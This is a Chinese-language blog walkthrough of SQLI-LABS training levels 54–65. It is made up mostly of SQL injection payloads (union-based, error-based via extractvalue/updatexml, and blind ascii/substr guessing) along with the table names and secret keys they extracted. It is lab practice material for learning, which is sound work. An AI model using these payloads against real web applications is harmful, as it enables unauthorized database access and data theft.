SQLI-LABS 靶场通过小记(54~65)

Posted 曹振国cc

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQLI-LABS 靶场通过小记(54~65)相关的知识,希望对你有一定的参考价值。

54~65

Less-54:

1.查询数据库
?id=-1' union select 1,database(),3 -- qwe					//库:challenges

2.查询表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' -- qwe		//表:0HH6JD95U8

3.查询字段
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='0HH6JD95U8' -- qwe		//字段:id,sessid,secret_IK8H,tryy

4.查询数据
?id=-1' union select 1,group_concat(secret_IK8H),3 from 0HH6JD95U8 -- qwe				//key:5TyUvzJndld9x4XamGn09368

Less-55:

和54题相同,只不过需要括号)闭合

?id=-1) union select 1,2,3 -- qwe

Less-56:

与54题相同,只不过需要单引号括号')闭合

?id=-1') union select 1,2,3 -- qwe

Less-57:

与54题相同,只不过这道题需要双引号"闭合

?id=-1" union select 1,2,3 -- qwe

Less-58:

通过在id后加反斜杠,发现需要单引号'闭合,经过测试不能通过union进行联合查询,但是会产生报错信息,使用报错注入

1.报错注入查询库名
?id=-1' and extractvalue(1, concat(0x5c, (select database()))) -- qwe			//库名:challenges

2.查询表名
?id=-1' and updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema='challenges' limit 0,1)),0) -- qwe
//表:46AZEIPRHM		199S5PGWIH

3.查询字段
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='199S5PGWIH' limit 0,1),0x7e),1) -- qwe
//字段:id,sessid,secret_QGRQ,tryy

4.查询数据
?id=-1' and updatexml(1,concat(0x7e,(select secret_QGRQ from 199S5PGWIH limit 0,1),0x7e),1) -- qwe
//数据:eqF0rqlhQso5Ce2DtnCtJ3JU

Less-59:

与58题相同,不用单引号闭合

/?id=-1 and extractvalue(1, concat(0x5c, (select database()))) -- qwe

Less-60:

与58题相同,只不过需要使用双引号括号")闭合

?id=-1") and extractvalue(1, concat(0x5c, (select database()))) -- qwe

Less-61:

与58题相同,这题需要使用单引号括号括号'))闭合

?id=-1')) and extractvalue(1, concat(0x5c, (select database()))) -- qwe

Less-62:

使用')闭合,在130次内完成盲注

1.判断数据库名的长度
?id=1') and length(database()=10) -- qwe							//正常说明是长度是10

2.利用ascii码猜测数据库名
?id=1') and ascii(substr(database(),1,1))=99 -- qwe					c
?id=1') and ascii(substr(database(),2,1))=104 -- qwe				h
............阿巴阿巴太多了,以此类推吧

Less-63:

与62题相同,使用单引号闭合

?id=1' and ascii(substr(database(),1,1))=99 -- qwe					c

Less-64:

与62题相同,使用括号括号))闭合

?id=1)) and ascii(substr(database(),1,1))=99 -- qwe

Less-65:

无需闭合

?id=1 and ascii(substr(database(),1,1))=99 -- qwe


🌸​完结撒花🌸

  ​1~65,堆叠注入和报错注入挺让人头疼的所以我写的比较简单,为了做出这65道题翻阅了有7,8篇博客(因为我比较菜)🤗​,做完这65道题收获还是蛮多的,也更让我深刻的认识到了自身的不足,还是需要继续“好好学习,天天向上”啊📚✏️​​📚​✏️​!

以上是关于SQLI-LABS 靶场通过小记(54~65)的主要内容,如果未能解决你的问题,请参考以下文章

SQLI-LABS 靶场通过小记(54~65)

SQLI-LABS 靶场通过小记(39~53)

SQLI-LABS 靶场通过小记(39~53)

SQLI-LABS 靶场通过小记(39~53)

SQLI-LABS 靶场通过小记(23~38)

SQLI-LABS 靶场通过小记(23~38)